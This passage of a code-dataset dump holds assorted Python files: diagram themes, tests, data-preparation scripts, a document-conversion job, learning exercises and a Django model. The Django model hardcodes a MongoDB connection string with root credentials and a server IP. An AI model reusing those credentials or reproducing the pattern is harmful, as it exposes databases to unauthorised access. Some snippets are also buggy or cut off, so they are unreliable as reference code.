\"white\",\n \"compound\": \"true\", \n \"pad\": \"1.0\",\n \"splines\": \"ortho\",\n \"nodesep\": \"1.0\",\n \"ranksep\": \"1.0\",\n \"fontname\": \"Calibri\",\n \"fontsize\": \"24\",\n \"fontcolor\": \"#2D3436\",\n \"style\": \"rounded\",\n \"rankdir\": \"LR\",\n \"labeljust\": \"l\",\n \"labelloc\": 't',\n }\n\n theme_cluster_attrs = {\n \"style\": \"rounded\",\n \"labeljust\": \"l\",\n \"pencolor\": \"#AEB6BE\",\n \"fontname\": \"Calibri\",\n \"fontsize\": \"12\",\n \"margin\": \"30\"\n }\n\n theme_node_attrs = {\n \"shape\": \"invis\",\n \"style\": \"rounded,filled\",\n \"fixedsize\": \"true\",\n \"width\": \"1.0\",\n \"height\": \"1.5\",\n \"labelloc\": \"b\",\n \"imagescale\": \"true\",\n \"fontname\": \"Calibri\",\n \"fontsize\": \"13\",\n \"fontcolor\": \"#2D3436\",\n \"color\": \"invis\",\n \"fillcolor\": \"invis\"\n }\n\n theme_edge_attrs = {\n \"penwidth\": \"2\",\n \"minlen\": \"2.0\",\n \"fontname\": \"Calibri\"\n }\n\n self.graph_attrs.update(theme_graph_attrs)\n self.cluster_attrs.update(theme_cluster_attrs)\n self.node_attrs.update(theme_node_attrs)\n self.edge_attrs.update(theme_edge_attrs)\n\n if graph_attr_overrides is not None:\n self.graph_attrs.update(graph_attr_overrides)\n\n if cluster_attr_overrides is not None:\n self.cluster_attrs.update(cluster_attr_overrides)\n\n if node_attr_overrides is not None:\n self.node_attrs.update(node_attr_overrides)\n\n if edge_attr_overrides is not None:\n self.edge_attrs.update(edge_attr_overrides)\n\n if color_overrides:\n self.colors = color_overrides\n\nclass DarkMode():\n\n def __init__(self, graph_attr_overrides={}, cluster_attr_overrides={}, node_attr_overrides={}, edge_attr_overrides={}, color_overrides=[]):\n\n self.graph_attrs = default_graph_attrs\n self.cluster_attrs = default_cluster_attrs\n self.edge_attrs = default_edge_attrs\n self.node_attrs = default_node_attrs\n \n theme_graph_attrs = {\n \"bgcolor\": \"#17202A\",\n \"compound\": \"true\", \n \"pad\": \"1.0\",\n \"splines\": \"ortho\",\n \"nodesep\": \"1.0\",\n \"ranksep\": \"1.0\",\n \"fontname\": \"Sans-Serif\",\n \"fontsize\": \"24\",\n \"fontcolor\": \"#EEEEEE\",\n \"style\": \"rounded\",\n \"rankdir\": \"LR\",\n \"labeljust\": \"l\",\n \"labelloc\": 't',\n }\n\n theme_cluster_attrs = {\n \"style\": \"rounded,dotted\",\n \"labeljust\": \"l\",\n \"pencolor\": \"#AEB6BE\",\n \"fontname\": \"Sans-Serif\",\n \"fontsize\": \"12\",\n \"fontcolor\": \"#EEEEEE\",\n \"margin\": \"30\"\n }\n\n theme_node_attrs = {\n \"shape\": \"invis\",\n \"style\": \"rounded,filled\",\n \"fixedsize\": \"true\",\n \"width\": \"1.0\",\n \"height\": \"1.5\",\n \"labelloc\": \"b\",\n \"imagescale\": \"true\",\n \"fontname\": \"Sans-Serif\",\n \"fontsize\": \"13\",\n \"fontcolor\": \"#EEEEEE\",\n \"color\": \"invis\",\n \"fillcolor\": \"invis\"\n }\n\n theme_edge_attrs = {\n \"penwidth\": \"2\",\n \"minlen\": \"2.0\",\n \"color\": \"#EEEEEE\"\n }\n\n self.graph_attrs.update(theme_graph_attrs)\n self.cluster_attrs.update(theme_cluster_attrs)\n self.node_attrs.update(theme_node_attrs)\n self.edge_attrs.update(theme_edge_attrs)\n self.colors = [\"#1C2833\", \"#212F3D\", \"#273746\", \"#2C3E50\", \"#566573\"]\n\n if graph_attr_overrides is not None:\n self.graph_attrs.update(graph_attr_overrides)\n\n if cluster_attr_overrides is not None:\n self.cluster_attrs.update(cluster_attr_overrides)\n\n if node_attr_overrides is not None:\n self.node_attrs.update(node_attr_overrides)\n\n if edge_attr_overrides is not None:\n self.edge_attrs.update(edge_attr_overrides)\n\n if color_overrides:\n self.colors = color_overrides","sub_path":"architectures/themes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"538918273","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.4 (3310)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.6-intel/egg/tests/ops/test_transformation_ops.py\n# Compiled at: 2018-04-05 20:01:41\n# Size of source mod 2**32: 1420 bytes\nfrom trane.ops.transformation_ops import *\nfrom pandas import DataFrame\nfrom trane.utils.table_meta import TableMeta as TM\nimport numpy as np\ndf = DataFrame({'col': [1, 2, 3, 4, 5]})\nmeta = TM({'tables': [\n {'fields': [\n {'name': 'col', 'type': TM.SUPERTYPE[TM.TYPE_FLOAT], \n 'subtype': TM.TYPE_FLOAT}]}]})\n\ndef test_identity_transformation_op_input_value():\n op = IdentityTransformationOp('col')\n op.op_type_check(meta)\n output = op(df.copy())\n assert np.all(output.values == np.asarray([[1, 2, 3, 4, 5]]).T)\n\n\ndef test_diff_transformation_op_input_value():\n op = DiffTransformationOp('col')\n op.op_type_check(meta)\n output = op(df.copy())\n assert np.all(output.values == np.asarray([[0, 1, 1, 1, 1]]).T)\n\n\ndef test_ObjectFrequencyTransformationOp():\n df = DataFrame([(1.0, 100), (2.0, 70), (3.0, 100),\n (4.0, 70), (5.0, 70)], columns=['id', 'height'])\n op = ObjectFrequencyTransformationOp('height')\n op2 = ObjectFrequencyTransformationOp('id')\n output = op(df.copy())\n output2 = op2(df.copy())\n expected = DataFrame([(1.0, 2), (2.0, 3)], columns=[\n 'id', 'height'])\n expected2 = DataFrame([(1, 100), (1, 70), (1, 100),\n (1, 70), (1, 70)], columns=['id', 'height'])\n assert output.equals(expected)\n assert output2.equals(expected2)","sub_path":"pycfiles/trane-0.1.0-py3.4/test_transformation_ops.cpython-34.py","file_name":"test_transformation_ops.cpython-34.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"143773557","text":"# https://leetcode.com/problems/most-common-word/\n\ndef mostCommonWord(paragraph, banned):\n \"\"\"\n :type paragraph: str\n :type banned: List[str]\n :rtype: str\n \"\"\"\n import re\n import collections\n import operator\n def santise(w):\n w = re.sub('[$,.:;?!]', '', w)\n return w.lower().strip(\"'\").strip(\"\\\"\")\n\n #words = paragraph.split(\" \")\n words = re.split('[$.,\\s+]', paragraph)\n print(words)\n banned_words = set([w.lower() for w in banned])\n word_count = {} \n for word in words:\n word = santise(word)\n if word not in banned_words:\n if word != \"\":\n try:\n word_count[word] = word_count[word] + 1\n except KeyError: \n word_count[word] = 1\n \n word_occurance = sorted(word_count.items(), key=operator.itemgetter(1))\n sorted_dict = collections.OrderedDict(word_occurance)\n used_word = word_occurance[-1]\n return used_word[0]\n \n\n\nparagraph = \"Bob hit a ball, the hit BALL flew far after it was hit.\"\nbanned = [\"hit\"]\nparagraph = \"a, a, a, a, b,b,b,c, c\"\nbanned = [\"a\"]\na = mostCommonWord(paragraph, banned)\nprint(a)","sub_path":"most_common_word.py","file_name":"most_common_word.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"209564757","text":"import requests \nimport os\nfrom datetime import datetime \n\nfrom settings import *\n\n\n\n# only unzip filings from current year\n#CURRENT_YEAR = '2019'\n\n# run all years with CURRENT_YEAR = '2'\nCURRENT_YEAR = '2'\n\ndef makedir(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n\nif __name__ == '__main__':\n\n infile = open(PAPER_ZIPFILE_MANIFEST, 'r')\n filings = []\n for raw_row in infile:\n row = raw_row.replace(\"\\n\",\"\")\n if row.endswith(\".zip\"):\n print(\"'%s'\" % row)\n filings.append(row)\n\n\n for i, filing in enumerate(filings):\n raw_name = filing.replace(\".zip\", \"\")\n directory_path = RAW_PAPER_DIR + raw_name\n makedir(directory_path)\n\n if CURRENT_YEAR in raw_name:\n\n unzip_cmd = \"unzip -o %s%s -d %s%s/\" % (PAPER_ZIPDIR, filing, RAW_PAPER_DIR, raw_name)\n print(i)\n print(unzip_cmd)\n os.system(unzip_cmd)\n else:\n print(\"Skipping zipfile %s\" % raw_name)\n\n","sub_path":"unzip_paper_filings.py","file_name":"unzip_paper_filings.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"247982282","text":"from django.db import models\nfrom pymongo import MongoClient\nfrom django.db.models.signals import pre_delete,post_save,pre_save\nfrom django.dispatch.dispatcher import receiver\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\n\nuri = \"mongodb://root:root@40.117.234.124:27017/?authSource=admin&authMechanism=SCRAM-SHA-256\"\nclient = MongoClient(uri)\nmydb = client[\"cloudassg2\"]\nmycol = mydb[\"imagemetadata\"]\n\nclass ImageSet(models.Model):\n id = models.AutoField(primary_key=True)\n image = models.ImageField(upload_to='imgset/', null=True, blank=False)\n\ndef getmetadatadict(path):\n retdict = {}\n retdict.update({\"imgpath\":str(path)})\n image = Image.open(path)\n exifdata = image.getexif()\n for tag_id in exifdata:\n tag = TAGS.get(tag_id, tag_id)\n data = exifdata.get(tag_id)\n if isinstance(data, bytes):\n data = data.decode()\n data = str(data)\n tag = str(tag)\n retdict.update({tag:data})\n #print(f\"{tag}: {data}\")\n #print(retdict)\n return retdict\n\n@receiver(post_save, sender=ImageSet)\ndef imageset_save(sender, instance, **kwargs):\n metadict = getmetadatadict(instance.image.path)\n #print(metadict)\n x = mycol.insert_one(metadict)\n\n@receiver(pre_delete, sender=ImageSet)\ndef imageset_delete(sender, instance, **kwargs):\n myquery = { \"imgpath\":str(instance.image.path)}\n mycol.delete_one(myquery) ","sub_path":"imgmeta/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"54218095","text":"from glob import glob\nimport json\nimport parser\n\n\ndef get_top_subreddits(parsed_sentence, relevant_terms):\n ranks = []\n for subreddit_word_count in relevant_terms:\n weight = 0\n name, word_count = subreddit_word_count\n word_count = dict(word_count)\n for word, count in parsed_sentence.items():\n if word in word_count:\n weight += count * word_count[word]\n if weight != 0:\n ranks.append((name, weight))\n ranks.sort(key=lambda tup: tup[1], reverse=True)\n return ranks\n\n\ndef classify(relevant_terms, sentence):\n word_count = parser.sentence_to_word_dict(sentence)\n result = get_top_subreddits(word_count, relevant_terms)\n return result\n\nif __name__ == '__main__':\n sentence = 'Teach me how to program Haskell'\n with open('relevantTerms.json') as data_file:\n relevant_terms = json.load(data_file)\n data_file.close()\n classify(relevant_terms, sentence)\n","sub_path":"classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"37951840","text":"import json\nimport os\nimport shutil\nimport tempfile\nfrom typing import Dict, List, Optional, Union, cast\n\nfrom googleapiclient.discovery import build\nfrom googleapiclient.http import MediaFileUpload\nfrom oauth2client.client import GoogleCredentials\n\nfrom config import get_content_root, get_node_modules_bin\nfrom jobs.base.subprocess_job import SubprocessJob\nfrom jobs.pull.gdoc import pull_gdoc\nfrom util.files import Files, list_files, move_files, temp_dir\nfrom util.gapis import gdrive_service\n\n\nclass Convert(SubprocessJob):\n \"\"\"\n A job that converts files from one format to another.\n\n Delegates convertion the Encoda CLI https://github.com/stencila/encoda\n which should be installed globally within the worker's Docker container.\n \"\"\"\n\n name = \"convert\"\n\n def do( # type: ignore[override]\n self,\n input: Union[str, bytes],\n output: Union[str, List[str]],\n options: Dict[str, Union[str, bool]] = {},\n src: str = \".\",\n dest: str = \".\",\n secrets: Dict = {},\n **kwargs,\n ) -> Files:\n \"\"\"\n Do the conversion.\n\n The signature of this method is similar to that of Encoda's\n `convert` function but with a flatter structure for the options\n aligned to the Encoda CLI.\n\n Allows for multiple outputs and alternative source and desination\n directories (with dictionary of files relative to destination).\n\n input: The path to the input file, or bytes to be sent to stdin.\n output: The path to the output file, a list of outputs files, or\n \"-\" for output stream bytes (mostly when used by other jobs).\n options:\n from: The format to convert from (defaults to ext name of input)\n to: The format to convert to (defaults to ext name of output)\n theme: Name of the theme to use for outputs\n src: The source storage directory e.g. `snapshots/42/T5kdbaJ8ZmNTXuuv4XJnsi/`\n defaulting to the current working directory\n dest: The destination storage directory e.g. `content/3212/`\n defaulting to the current working directory\n \"\"\"\n assert (isinstance(input, str) or isinstance(input, bytes)) and len(\n input\n ) > 0, \"input must be a non-empty string or bytes\"\n assert isinstance(output, str) or isinstance(\n output, list\n ), \"output must be a string or list of strings\"\n assert isinstance(options, dict), \"options must be a dictionary\"\n\n # Rewrite output path(s) to a temporary directory\n temp = None\n outputs = output if isinstance(output, list) else [output]\n for index, output in enumerate(outputs):\n if output != \"-\":\n if temp is None:\n temp = temp_dir()\n outputs[index] = os.path.join(temp, output)\n\n # Generate arguments to Encoda and call it\n args = encoda_args(input, outputs, options)\n result = super().do(args, input=input if isinstance(input, bytes) else None)\n\n # If the output is a stream then just return the bytes\n if len(outputs) == 1 and outputs[0] == \"-\":\n return result\n\n assert isinstance(temp, str)\n\n # For some conversion targets it is necessary to also create a source.\n source: Optional[Dict] = None\n if (\n len(outputs) == 1\n and isinstance(outputs[0], str)\n and outputs[0].endswith(\".gdoc\")\n ):\n source = create_gdoc_source(output=outputs[0], secrets=secrets)\n\n # Get list of created files and add source if needed\n files = list_files(temp)\n filenames = list(files.keys())\n if len(filenames) > 0 and source:\n files[filenames[0]][\"source\"] = source\n\n # Move all files to destination.\n dest_parts = os.path.normpath(dest).split(\"/\")\n if dest_parts[0] == \"content\":\n dest_root = get_content_root()\n else:\n dest_root = \".\"\n move_files(temp, dest=os.path.join(dest_root, *dest_parts[1:]))\n\n return files\n\n\ndef encoda_args( # type: ignore\n input: Union[str, bytes], outputs: List[str], options: Dict[str, Union[str, bool]],\n) -> List[str]:\n \"\"\"\n Create an array of Encoda arguments based on job inputs, outputs and options.\n \"\"\"\n args = [\n get_node_modules_bin(\"encoda\"),\n \"convert\",\n \"-\" if isinstance(input, bytes) else input,\n ] + outputs\n\n # Ensure XML files with the `.jats.xml` extension are treated as\n # JATS format (otherwise they are treated as plain XML)\n if isinstance(input, str) and input.endswith(\".jats.xml\"):\n options[\"from\"] = \"jats\"\n\n for name, value in options.items():\n # Determine --from option\n # Encoda currently does not allow for mimetypes in the `from` option.\n # This replaces some mimetypes with codec names for formats that are\n # not easily identifiable from their extension. This means that for other\n # files, the file extension will be used to determine the format (which\n # works in most cases).\n if name == \"from\" and isinstance(value, str):\n value = {\n \"application/jats+xml\": \"jats\",\n \"application/vnd.google-apps.document\": \"gdoc\",\n }.get(value, value)\n # If the value has a slash in it, assume it's still a mimetype\n # and skip\n if isinstance(value, str) and \"/\" in value:\n continue\n\n # Transform boolean values\n if value is False:\n value = \"false\"\n if value is True:\n value = \"true\"\n\n args.append(\"--{}={}\".format(name, value))\n return args\n\n\ndef create_gdoc_source(output: str, secrets: Dict) -> Dict[str, str]:\n \"\"\"\n Create a GoogleDoc from input and return its id.\n\n When encoding to `gdoc`, Encoda actually creates a `docx` file which\n this function then uploads to Google Drive and has it converted\n to a Google Doc there (because it is not possible to upload the\n Google Doc JSON content directly). Finally, we fetch the Google Doc\n JSON and save it to the output file.\n \"\"\"\n # Create a temporary docx to upload\n # Although it is already a docx, for this request to succeed it\n # needs to have the right extension.\n docx = output + \".docx\"\n shutil.copyfile(output, docx)\n\n # Create the Google Doc as a new source\n gdoc = (\n gdrive_service(secrets)\n .files()\n .create(\n body={\n \"name\": os.path.basename(output),\n \"mimeType\": \"application/vnd.google-apps.document\",\n },\n media_body=MediaFileUpload(docx),\n media_mime_type=\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\",\n )\n .execute()\n )\n source = dict(type_name=\"GoogleDocs\", doc_id=gdoc[\"id\"])\n\n # Fetch the Google Doc JSON\n pull_gdoc(source=source, path=output, secrets=secrets)\n\n # Remove the temporary docx\n os.unlink(docx)\n\n return source\n","sub_path":"worker/jobs/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":7123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"107529006","text":"#!/usr/bin/env python3\n\n\"\"\"\nPrepare Tacotron training data\n\"\"\"\n\nimport csv\nimport os\nimport random\n\nfrom sentence import encode_sentence\n\nVALIDATION_THRESHOLD = 0.1\n\ndef prepare_training_data(input_filename, training_output_filename, validation_output_filename, wav_directory=None):\n with open(input_filename, 'r') as infile:\n with open(training_output_filename, 'w') as training_outfile:\n with open(validation_output_filename, 'w') as validation_outfile:\n reader = csv.reader(infile, delimiter='|', quoting=csv.QUOTE_NONE)\n training_writer = csv.writer(training_outfile, delimiter='|', quoting=csv.QUOTE_NONE, quotechar='')\n validation_writer = csv.writer(validation_outfile, delimiter='|', quoting=csv.QUOTE_NONE, quotechar='')\n prepare_training_csvs(reader, training_writer, validation_writer, wav_directory)\n\ndef prepare_training_csvs(csv_reader, training_csv_writer, validation_csv_writer, wav_directory=None):\n \"\"\"\n Read LJSpeech metadata.csv, filter out things we can't parse, then save the\n good (passing) examples into a new file.\n \"\"\"\n success_count = 0\n failure_count = 0\n training_count = 0\n validation_count = 0\n\n for row in csv_reader:\n if len(row) != 3:\n failure_count += 1\n print('Problem row: {}'.format(row))\n continue\n wav = row[0]\n original_sentence = row[1]\n expanded_sentence = row[2]\n encoded_sentence = encode_sentence(expanded_sentence)\n\n passes = True\n for token in encoded_sentence:\n if not isinstance(token, int):\n # If we can't encode the entire sentence, don't use it.\n # We can improve our sentence tokenizing to get a bettter pass rate,\n # but we're already in the long tail zone of deminishing returns.\n passes = False\n break\n\n if not passes:\n failure_count += 1\n continue\n\n training = True\n if random.random() < VALIDATION_THRESHOLD:\n training = False\n\n if not wav.endswith('.wav'):\n # Tacotron expects filenames. LJS does not include extensions.\n wav += '.wav'\n\n if wav_directory:\n wav = os.path.join(wav_directory, wav)\n\n try:\n # Here we only save two of the three columns back, because that's what Tacotron expects\n if training:\n training_csv_writer.writerow([wav, expanded_sentence])\n training_count += 1\n else:\n validation_csv_writer.writerow([wav, expanded_sentence])\n validation_count += 1\n except:\n print('Failure: {}'.format(row))\n success_count +=1\n\n print('Success count: {}'.format(success_count))\n print('Failure count: {}'.format(failure_count))\n print('Training count: {}'.format(training_count))\n print('Validation count: {}'.format(validation_count))\n\n validation_percent = validation_count / (validation_count + training_count)\n print('Validation percent: {}'.format(validation_percent))\n\nif __name__ == '__main__':\n input_file = '/home/bt/datasets/LJSpeech-1.1/metadata.csv'\n training_file = '/home/bt/datasets/LJSpeech-1.1/filtered_training.csv'\n validation_file = '/home/bt/datasets/LJSpeech-1.1/filtered_validation.csv'\n wav_directory = '/home/bt/datasets/LJSpeech-1.1/wavs'\n\n prepare_training_data(input_file, training_file, validation_file, wav_directory)\n\n","sub_path":"src/tacotron_training.py","file_name":"tacotron_training.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"648124741","text":"\"\"\"\nProvide a graphical user interface (GUI) to the user configuration file (``cea.config``).\n\"\"\"\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport json\nimport htmlPy\nimport cea.config\n\n__author__ = \"Daren Thomas\"\n__copyright__ = \"Copyright 2017, Architecture and Building Systems - ETH Zurich\"\n__credits__ = [\"Daren Thomas\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Daren Thomas\"\n__email__ = \"cea@arch.ethz.ch\"\n__status__ = \"Production\"\n\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\n\nclass Backend(htmlPy.Object):\n \"\"\"Contains the backend functions, callable from the GUI.\"\"\"\n def __init__(self, config):\n super(Backend, self).__init__()\n # Initialize the class here, if required.\n self.config = config\n\n @htmlPy.Slot(str, str, result=None)\n def save_section(self, section_name, json_data):\n print(\"Saving section: %s\" % section_name)\n print(json_data)\n values = json.loads(json_data)\n print(values)\n for key, value in values.items():\n print(\"Setting %s to %s\" % (key, value))\n self.config.sections[section_name].parameters[key].set(value)\n self.config.save()\n return\n\n @htmlPy.Slot(str, result=str)\n def get_parameters(self, section_name):\n result = json.dumps({p.name: p.typename for p in self.config.sections[section_name].parameters.values()})\n return result\n\n @htmlPy.Slot(str, result=str)\n def get_default_parameters(self, section_name):\n default_config = cea.config.Configuration(cea.config.DEFAULT_CONFIG)\n result = json.dumps({p.name: {'type': p.typename,\n 'value': p.get(),\n 'raw': p.get_raw()}\n for p in default_config.sections[section_name].parameters.values()})\n return result\n\n\ndef main(config):\n \"\"\"\n Start up the editor to edit the configuration file.\n\n :param config: the configuration file wrapper object\n :type config: cea.config.Configuration\n :return:\n \"\"\"\n app = htmlPy.AppGUI(title=u\"CEA Configuration File Editor\", maximized=False, developer_mode=True)\n\n app.template_path = os.path.join(BASE_DIR, 'templates')\n app.static_path = os.path.join(BASE_DIR, 'static')\n\n app.template = (\"config_editor.html\", {\"config\": config})\n app.bind(Backend(config), variable_name='backend')\n app.start()\n\n\nif __name__ == '__main__':\n main(cea.config.Configuration())\n","sub_path":"legacy/config_editor/config_editor.py","file_name":"config_editor.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"589066903","text":"# Converts PDF to image to find location data\n\nimport os, glob\nfrom PIL import Image\n\nfrom pdf2image import convert_from_path\n\n\nfolder_path = 'C:/Users/Richard/Projects/OCR Invoice Processor/Convert'\ncount = 1\n\nfor filename in glob.glob(os.path.join(folder_path, '*.pdf')):\n pages = convert_from_path(filename)\n for page in pages:\n page.save('C:/Users/Richard/Projects/OCR Invoice Processor/temp/img' + str(count) + '.png', 'PNG')\n count += 1\n image = Image.open('temp.png')\n","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"226091052","text":"#divide and conquer\r\ndef nuts_and_bolts(nuts, bolts):\r\n nuts.sort()\r\n bolts.sort()\r\n stopSign = False\r\n i = 0\r\n j = 0\r\n while not stopSign and i < len(nuts) and j < len(bolts):\r\n if nuts[i] == bolts[j]:\r\n stopSign = True\r\n elif nuts[i] < bolts[j]:\r\n i += 1\r\n else:\r\n j += 1\r\n return stopSign\r\n\r\ndef nuts_and_bolts(nuts, bolts):\r\n if len(nuts) >= 1 and len(bolts) >= 1:\r\n nuts.sort() # Big-O(nlog(n))\r\n bolts.sort() # Big-O(nlog(n))\r\n mid = nuts[0]\r\n nutsLess = []\r\n nutsMore = []\r\n boltsLess = []\r\n boltsMore = []\r\n for i in range(1, len(nuts)): #Big-O(n)\r\n if nuts[i] > mid:\r\n nutsMore.append(nuts[i])\r\n else:\r\n nutsLess.append(nuts[i])\r\n for i in range(0, len(bolts)):\r\n if bolts[i] > mid:\r\n boltsMore.append(bolts[i])\r\n elif bolts[i] < mid:\r\n boltsLess.append(bolts[i])\r\n else:\r\n print(str(mid) + \"matches\" + str(bolts[i]))\r\n nuts_and_bolts(nutsMore, boltsMore)\r\n nuts_and_bolts(nutsLess, boltsLess)\r\n\r\nnuts = [1, 2, 3, 4, 5, 6, 7, 8]\r\nbolts = [7, 6, 5, 4, 3, 2, 1, 9, 10]\r\nnuts_and_bolts(nuts, bolts)\r\n","sub_path":"FIT5211Week4Practice.py","file_name":"FIT5211Week4Practice.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"37664860","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\n\ndef estimate_coefficients(x, y):\n # size of the dataset OR number of observations/points\n n = np.size(x)\n\n # mean of x and y\n # Since we are using numpy just calling mean on numpy is sufficient\n mean_x, mean_y = np.mean(x), np.mean(y)\n\n # calculating cross-deviation and deviation about x\n SS_xy = np.sum(y*x - n*mean_y*mean_x)\n SS_xx = np.sum(x*x - n*mean_x*mean_x)\n\n # calculating regression coefficients\n b_1 = SS_xy / SS_xx\n b_0 = mean_y - b_1*mean_x\n\n return(b_0, b_1)\n\n # x,y are the location of points on graph\n # color of the points change it to red blue orange play around\n\n\n\ndef plot_regression_line(x, y, b, xlabel, ylabel):\n # plotting the points as per dataset on a graph\n plt.scatter(x, y, color = \"m\",marker = \"o\", s = 30)\n\n # predicted response vector\n y_pred = b[0] + b[1]*x\n\n # plotting the regression line\n plt.plot(x, y_pred, color = \"g\")\n\n # putting labels for x and y axis\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n\n # function to show plotted graph\n plt.show()\n\n\ndef predict_with_intercept(X, y):\n # Note the difference in argument order\n X = sm.add_constant(X) ## let's add an intercept (beta_0) to our model\n\n # Note the difference in argument order\n model = sm.OLS(y, X).fit() ## sm.OLS(output, input)\n predictions = model.predict(X)\n print(\"Predictions: \")\n print(predictions[0:5])\n\n # Print out the statistics\n print(model.summary())\n\n\n\ndef main(X, Y):\n df = pd.read_csv('../data/cleaned-outliers-auto-mpg.csv')\n\n x = df[X]\n y = df[Y] # Y is the variable we are trying to predict\n\n # estimating coefficients\n b = estimate_coefficients(x, y)\n print(\"Estimated coefficients:\\nb_0 = {} \\nb_1 = {}\".format(b[0], b[1]))\n\n predict_with_intercept(x, y)\n\n\nif __name__ == \"__main__\":\n main(['displacement', 'USA'], 'mpg')\n","sub_path":"task2/RegressionModel.py","file_name":"RegressionModel.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"344829623","text":"#-*- using:utf-8 -*-\nimport time\n\n\nif __name__ == '__main__':\n start = time.time()\n\n for i in range(100):\n print(\"a\")\n\n elapsed_time = time.time() - start\n print((\"elapsed_time:{0}\".format(elapsed_time)) + \"[sec]\")","sub_path":"mytest.py","file_name":"mytest.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"556715020","text":"# Things you should be able to do.\n\n# Write a function that takes a list and returns a new list with only the odd numbers.\ndef all_odd(some_list):\n odd_nums = []\n for number in some_list:\n if number % 2 != 0:\n odd_nums.append(number)\n return odd_nums\n\n# Write a function that takes a list and returns a new list with only the even numbers.\ndef all_even(some_list):\n even_nums = []\n for number in some_list:\n if number % 2 == 0:\n even_nums.append(number)\n return even_nums\n\n# Write a function that takes a list of strings and a new list with all strings of length 4 or greater.\ndef long_words(word_list):\n four_plus = []\n for word in word_list:\n if len(word) >= 4:\n four_plus.append(word)\n return four_plus\n\n# Write a function that finds the smallest element in a list of integers and returns it.\ndef smallest(some_list):\n smallest = some_list[0]\n for number in some_list:\n if number < smallest:\n smallest = number\n return smallest\n\n# Write a function that finds the largest element in a list of integers and returns it.\ndef largest(some_list):\n largest = some_list[0]\n for number in some_list:\n if number > largest:\n largest = number\n return largest\n\n# Write a function that takes a list of numbers and returns a new list of all those numbers divided by two.\ndef halvesies(some_list):\n halves = []\n for number in some_list:\n half = number / 2.0\n halves.append(half)\n return halves\n\n# Write a function that takes a list of words and returns a list of all the lengths of those words.\ndef word_lengths(word_list):\n word_lengths = []\n for word in word_list:\n length = len(word)\n word_lengths.append(length)\n return word_lengths\n\n# Write a function (using iteration) that sums all the numbers in a list.\ndef sum_numbers(numbers):\n total_sum = 0\n for number in numbers:\n total_sum += number\n return total_sum\n\n# Write a function that multiplies all the numbers in a list together.\ndef mult_numbers(numbers):\n total_mult = 1\n for number in numbers:\n total_mult *= number\n return total_mult\n\n# Write a function that joins all the strings in a list together (without using the join method) and returns a single string.\ndef join_strings(string_list):\n long_string = \"\"\n for string in string_list:\n long_string = long_string + string\n return long_string\n\n# Write a function that takes a list of integers and returns the average (without using the avg method)\ndef average(numbers):\n list_average = float(sum(numbers)) / len(numbers)\n return list_average","sub_path":"skills1.py","file_name":"skills1.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"524644753","text":"import unittest\nfrom unittest.mock import patch\nfrom hen_class import HenHouse, ErrorTimesOfYear\n\n\nclass TestHenHouse(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls) -> None:\n # optional method, may be used to initialize hen_house instance\n cls.hen_house = HenHouse(10)\n\n def test_init_with_less_than_min(self):\n # initialize HenHouse with hens_count less than HenHouse.min_hens_accepted\n # make sure error is raised\n with self.assertRaises(ValueError):\n self.hen_house = HenHouse(1)\n\n def test_season(self):\n # mock the datetime method/attribute which returns month number\n # make sure correct month (\"winter\"/\"spring\" etc.) is returned from season method\n # try to return different seasons\n with patch(\"hen_class.HenHouse.season\", \"winter\"):\n self.assertEqual(self.hen_house.season, \"winter\")\n with patch(\"hen_class.HenHouse.season\", \"spring\"):\n self.assertEqual(self.hen_house.season, \"spring\")\n with patch(\"hen_class.HenHouse.season\", \"summer\"):\n self.assertEqual(self.hen_house.season, \"summer\")\n with patch(\"hen_class.HenHouse.season\", \"autumn\"):\n self.assertEqual(self.hen_house.season, \"autumn\")\n\n def test_productivity_index(self):\n # mock the season method return with some correct season\n # make sure _productivity_index returns correct value based on season and HenHouse.hens_productivity attribute\n with patch(\"hen_class.HenHouse.season\", \"winter\"):\n 